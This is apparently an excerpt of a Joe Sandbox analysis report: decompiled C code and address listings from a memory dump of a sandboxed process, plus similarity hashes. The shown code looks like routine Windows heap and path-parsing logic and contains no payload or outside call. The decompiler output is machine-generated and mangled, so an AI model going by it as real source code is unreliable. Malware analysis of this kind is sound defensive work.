														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E02EDF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E02EDF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E02F64CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E02EED130(_t427, _t494, _t511);
				}
			}










































































              0x02f65ba5
              0x02f65baa
              0x02f65baf
              0x02f65bb4
              0x02f65bb6
              0x02f65bbc
              0x02f65bbe
              0x02f65bc4
              0x02f65bcd
              0x02f65bd3
              0x02f65bd6
              0x02f65bdc
              0x02f65be0
              0x02f65be3
              0x02f65beb
              0x02f65bf2
              0x02f65bf8
              0x02f65bfe
              0x02f65c04
              0x02f65c0e
              0x02f65c18
              0x02f65c1f
              0x02f65c25
              0x02f65c2a
              0x02f65c2c
              0x02f65c32
              0x02f65c3a
              0x02f65c3f
              0x02f65c42
              0x02f65c48
              0x02f65c5b
              0x02f65c5b
              0x02f65c2c
              0x02f65cb7
              0x02f65cb9
              0x02f65cbf
              0x02f65cc2
              0x02f65cca
              0x02f65ccb
              0x02f65ccb
              0x02f65cd1
              0x02f65cd7
              0x02f65cda
              0x02f65ce1
              0x02f65ce4
              0x02f65ce7
              0x02f65ced
              0x02f65cf3
              0x02f65cf9
              0x02f65cff
              0x02f65d08
              0x02f65d0a
              0x02f65d0e
              0x02f65d10
              0x00000000
              0x00000000
              0x02f65d16
              0x02f65d1a
              0x00000000
              0x00000000
              0x02f65d20
              0x02f65d22
              0x02f65d25
              0x02f65d2f
              0x02f65d2f
              0x02f65d33
              0x02f65d3d
              0x02f65d49
              0x02f65d4b
              0x00000000
              0x00000000
              0x02f65d5a
              0x02f65d5d
              0x02f65d60
              0x00000000
              0x00000000
              0x02f65d66
              0x02f65d69
              0x00000000
              0x00000000
              0x02f65d6f
              0x02f65d6f
              0x02f65d73
              0x02f65d79
              0x02f65d7f
              0x02f65d86
              0x02f65d95
              0x02f65d98
              0x02f65dba
              0x02f65dcb
              0x02f65dce
              0x02f65dd3
              0x02f65dd6
              0x02f65dd8
              0x02f65de6
              0x02f65dec
              0x02f65dee
              0x02f65df1
              0x02f65df3
              0x02f6635a
              0x02f6635a
              0x00000000
              0x02f6635a
              0x02f65dfe
              0x02f65e02
              0x02f65e05
              0x02f65e07
              0x02f65e10
              0x02f65e13
              0x02f65e1b
              0x02f65e1c
              0x02f65e21
              0x02f65e22
              0x02f65e23
              0x02f65e25
              0x02f65e2a
              0x02f65e2c
              0x02f65e2e
              0x02f65e36
              0x02f65e39
              0x02f65e42
              0x02f65e47
              0x02f65e4d
              0x02f65e54
              0x02f65e54
              0x02f65e54
              0x02f65e2e
              0x02f65e5c
              0x02f65e5f
              0x02f65e62
              0x02f65e64
              0x02f65e6b
              0x02f65e70
              0x02f65e7a
              0x02f65e7a
              0x02f65e7a
              0x02f65e6b
              0x02f65e7e
              0x02f65e7f
              0x02f65e7f
              0x02f65e81
              0x02f65e87
              0x02f65e8b
              0x02f65e8c
              0x02f65e8c
              0x02f65e8c
              0x02f65e9a
              0x02f65e9c
              0x02f65ea2
              0x02f65ea6
              0x02f65f50
              0x02f65f50
              0x02f65f57
              0x02f65f66
              0x02f65f66
              0x02f65f66
              0x02f65f68
              0x02f65f6a
              0x02f663d0
              0x00000000
              0x02f65f70
              0x02f65f70
              0x02f65f91
              0x02f65f9c
              0x02f65f9e
              0x02f65fa4
              0x02f65fa6
              0x02f6638c
              0x02f66392
              0x02f663a1
              0x02f663a7
              0x02f663af
              0x02f663af
              0x02f663bd
              0x02f663d8
              0x00000000
              0x02f663d8
              0x02f65fac
              0x02f65fb2
              0x02f65fb4
              0x02f65fbd
              0x02f65fc6
              0x02f65fce
              0x02f65fd4
              0x02f65fdc
              0x02f65fec
              0x02f65fed
              0x02f65fee
              0x02f65fef
              0x02f65ff9
              0x02f65ffa
              0x02f65ffb
              0x02f65ffc
              0x02f66000
              0x02f66004
              0x02f66012
              0x02f66012
              0x02f66018
              0x02f66019
              0x02f6601a
              0x02f6601b
              0x02f6601c
              0x02f66020
              0x02f66059
              0x02f6605c
              0x02f66061
              0x02f66061
              0x02f66022
              0x02f66022
              0x02f66022
              0x02f66025
              0x02f6602a
              0x02f6602b
              0x02f66031
              0x02f66037
              0x02f66038
              0x02f6603e
              0x02f66048
              0x02f66049
              0x02f6604a
              0x02f6604b
              0x02f6604c
              0x02f6604d
              0x02f66053
              0x02f66054
              0x02f66054
              0x02f66062
              0x02f66065
              0x02f66067
              0x02f6606a
              0x02f66070
              0x02f66075
              0x02f66076
              0x02f66081
              0x02f66087
              0x02f66095
              0x02f66099
              0x02f6609e
              0x02f660a4
              0x02f660ae
              0x02f660b0
              0x02f660b3
              0x02f660b6
              0x02f660b8
              0x02f660ba
              0x02f660ba
              0x02f660ba
              0x02f660ba
              0x02f660be
              0x02f660c0
              0x02f660c5
              0x02f660c5
              0x02f660c5
              0x02f660c6
              0x02f660cd
              0x02f66114
              0x02f660cf
              0x02f660cf
              0x02f660d4
              0x02f660d5
              0x02f660da
              0x02f660db
              0x02f660e1
              0x02f660e2
              0x02f660e8
              0x02f660f8
              0x02f660fd
              0x02f660fe
              0x02f66102
              0x02f66104
              0x02f66107
              0x02f66109
              0x02f6610b
              0x02f6610b
              0x02f6610b
              0x02f6610b
              0x02f6610f
              0x02f6610f
              0x02f66117
              0x02f6611a
              0x02f6611f
              0x02f66125
              0x02f66134
              0x02f66139
              0x02f6613f
              0x02f66146
              0x02f66148
              0x02f6614b
              0x02f6614d
              0x02f6614f
              0x02f6614f
              0x02f6614f
              0x02f6614f
              0x02f66153
              0x02f66159
              0x02f66159
              0x02f6615c
              0x02f66163
              0x02f66169
              0x02f6616c
              0x02f66172
              0x02f66181
              0x02f66186
              0x02f66187
              0x02f6618b
              0x02f66191
              0x02f66195
              0x02f661a3
              0x02f661bb
              0x02f661c0
              0x02f661c3
              0x02f661cc
              0x02f661d0
              0x02f661dc
              0x02f661de
              0x02f661e1
              0x02f661e4
              0x02f661e6
              0x02f661e8
              0x02f661e8
              0x02f661e8
              0x02f661e8
              0x02f661e6
              0x02f661ec
              0x02f661f3
              0x02f66203
              0x02f66209
              0x02f6620a
              0x02f66216
              0x02f6621d
              0x02f66227
              0x02f66241
              0x02f66246
              0x02f6624c
              0x02f66257
              0x02f66259
              0x02f6625c
              0x02f6625e
              0x02f66260
              0x02f66260
              0x02f66260
              0x02f66260
              0x02f6625e
              0x02f66264
              0x02f66267
              0x02f66269
              0x02f66315
              0x02f66315
              0x02f6631b
              0x02f6631e
              0x02f66324
              0x02f66327
              0x02f6632f
              0x02f66330
              0x02f66333
              0x02f6633a
              0x02f6633c
              0x02f66335
              0x02f66335
              0x02f66335
              0x02f6633f
              0x02f66342
              0x02f6634c
              0x02f66352
              0x02f66355
              0x02f66355
              0x02f66359
              0x00000000
              0x02f6626f
              0x02f66275
              0x02f66275
              0x02f66278
              0x02f6627e
              0x02f6627e
              0x02f66281
              0x02f66287
              0x02f6628d
              0x02f66298
              0x02f6629c
              0x02f662a2
              0x02f6629e
              0x02f6629e
              0x02f6629e
              0x02f662a7
              0x02f662a7
              0x02f662aa
              0x02f662b0
              0x02f662f0
              0x02f662f0
              0x02f662f2
              0x02f662f8
              0x02f662fd
              0x02f662b2
              0x02f662b2
              0x02f662b2
              0x02f662b5
              0x02f662dd
              0x02f662e2
              0x02f662e5
              0x02f662b7
              0x02f662b8
              0x02f662bb
              0x02f662bd
              0x02f662c0
              0x02f662c4
              0x02f662cd
              0x02f662cd
              0x02f662c0
              0x02f662bb
              0x02f662b5
              0x02f66302
              0x02f66303
              0x02f66305
              0x02f66305
              0x02f66305
              0x02f6630c
              0x02f6630c
              0x00000000
              0x02f6627e
              0x02f66269
              0x02f65eac
              0x02f65ebb
              0x02f65ebe
              0x02f65ecb
              0x02f65ecb
              0x02f65ece
              0x02f65ece
              0x02f65ed4
              0x02f65ed7
              0x02f65ed9
              0x02f65edb
              0x02f65edb
              0x02f65ee1
              0x02f65ee1
              0x02f65ee3
              0x02f65f20
              0x02f65f20
              0x02f65ee5
              0x02f65ee5
              0x02f65ee5
              0x02f65ee8
              0x02f65f11
              0x02f65f18
              0x02f65eea
              0x02f65eea
              0x02f65eed
              0x02f65ef2
              0x02f65ef8
              0x02f65efb
              0x02f65f0a
              0x02f65f0a
              0x02f65eed
              0x02f65ee8
              0x02f65f22
              0x02f65f28
              0x00000000
              0x00000000
              0x02f65f30
              0x02f65f31
              0x02f65f37
              0x02f65f3a
              0x02f65f3d
              0x02f65f44
              0x00000000
              0x00000000
              0x00000000
              0x02f65f46
              0x02f65f48
              0x02f65f4d
              0x00000000
              0x02f65f4d
              0x02f65dda
              0x02f65ddf
              0x00000000
              0x02f65ddf
              0x02f65dd8
              0x02f65da7
              0x02f65da9
              0x02f65dac
              0x02f65dae
              0x00000000
              0x02f65db4
              0x02f65db4
              0x00000000
              0x02f65db4
              0x02f65dae
              0x02f65d88
              0x02f65d8d
              0x02f66363
              0x02f66369
              0x02f6636a
              0x02f66370
              0x02f66372
              0x02f6637a
              0x02f6637b
              0x02f6637d
              0x00000000
              0x00000000
              0x02f6637f
              0x02f66385
              0x00000000
              0x02f66385
              0x02f65d38
              0x02f65d3b
              0x00000000
              0x00000000
              0x00000000
              0x02f65d3b
              0x02f65d27
              0x02f65d29
              0x00000000
              0x00000000
              0x00000000
              0x02f66360
              0x00000000
              0x02f66360
              0x02f65c10
              0x02f65c10
              0x02f663da
              0x02f663e5
              0x02f663e5

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dc1b9571ac6319715af1010d04a49520cc6677ad6d189d0dfbf907065f02c0fa
              • Instruction ID: 2a096f6e0cf13a899a93e15b1ee76fdae79910d3f4ca60478bc0ed50718f6b7b
              • Opcode Fuzzy Hash: dc1b9571ac6319715af1010d04a49520cc6677ad6d189d0dfbf907065f02c0fa
              • Instruction Fuzzy Hash: 99424771E002298FDB24CF68C885BA9B7B5FF49344F1481AADA5DEB342E7349985CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EB4120 Relevance: .4, Instructions: 444COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 92%
              			E02EB4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x2f8d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E02ECF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E02EB6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L02EB4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E02EB6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M02EB45F8))) {
												case 0:
													_v568 = 0x2e71078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x2e711c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L02EB4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E02EDF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E02EDF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E02E952A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E02EAEB70(1, 0x2f879a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E02EAAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E02ED95D0();
																			L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E02EDB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E02ED3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E02EDB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































              0x02eb4128
              0x02eb4135
              0x02eb413c
              0x02eb4141
              0x02eb4145
              0x02eb4147
              0x02eb414e
              0x02eb4151
              0x02eb4159
              0x02eb415c
              0x02eb4160
              0x02eb4164
              0x02eb4168
              0x02eb416c
              0x02eb417f
              0x02eb4181
              0x02eb446a
              0x02eb446a
              0x02eb418c
              0x02eb4195
              0x02eb4199
              0x02eb4432
              0x02eb4439
              0x02eb443d
              0x02eb4442
              0x02eb4447
              0x00000000
              0x02eb419f
              0x02eb41a3
              0x02eb41b1
              0x02eb41b9
              0x02eb41bd
              0x02eb45db
              0x02eb45db
              0x00000000
              0x02eb41c3
              0x02eb41c3
              0x02eb41ce
              0x02eb41d4
              0x02efe138
              0x02efe13e
              0x02efe169
              0x02efe16d
              0x02efe19e
              0x02efe16f
              0x02efe16f
              0x02efe175
              0x02efe179
              0x02efe18f
              0x02efe193
              0x00000000
              0x02efe199
              0x00000000
              0x02efe199
              0x02efe193
              0x00000000
              0x00000000
              0x00000000
              0x02eb41da
              0x02eb41da
              0x02eb41df
              0x02eb41e4
              0x02eb41ec
              0x02eb4203
              0x02eb4207
              0x02efe1fd
              0x02eb4222
              0x02eb4226
              0x02efe1f3
              0x02efe1f3
              0x02eb422c
              0x02eb422c
              0x02eb4233
              0x02efe1ed
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02eb4239
              0x02eb4239
              0x02eb4239
              0x02eb4239
              0x02eb4233
              0x02eb4226
              0x02eb41ee
              0x02eb41ee
              0x02eb41f4
              0x02eb4575
              0x02efe1b1
              0x02efe1b1
              0x00000000
              0x02eb457b
              0x02eb457b
              0x02eb4582
              0x02efe1ab
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02eb4588
              0x02eb4588
              0x02eb458c
              0x02efe1c4
              0x02efe1c4
              0x00000000
              0x02eb4592
              0x02eb4592
              0x02eb4599
              0x02efe1be
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02eb459f
              0x02eb459f
              0x02eb45a3
              0x02efe1d7
              0x02efe1e4
              0x00000000
              0x02eb45a9
              0x02eb45a9
              0x02eb45b0
              0x02efe1d1
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02eb45b6
              0x02eb45b6
              0x02eb45b6
              0x00000000
              0x02eb45b6
              0x02eb45b0
              0x02eb45a3
              0x02eb4599
              0x02eb458c
              0x02eb4582
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02eb41f4
              0x02eb423e
              0x02eb4241
              0x02eb45c0
              0x02eb45c4
              0x00000000
              0x02eb45ca
              0x02eb45ca
              0x00000000
              0x02efe207
              0x02efe20f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02eb45d1
              0x00000000
              0x00000000
              0x02eb45ca
              0x00000000
              0x02eb4247
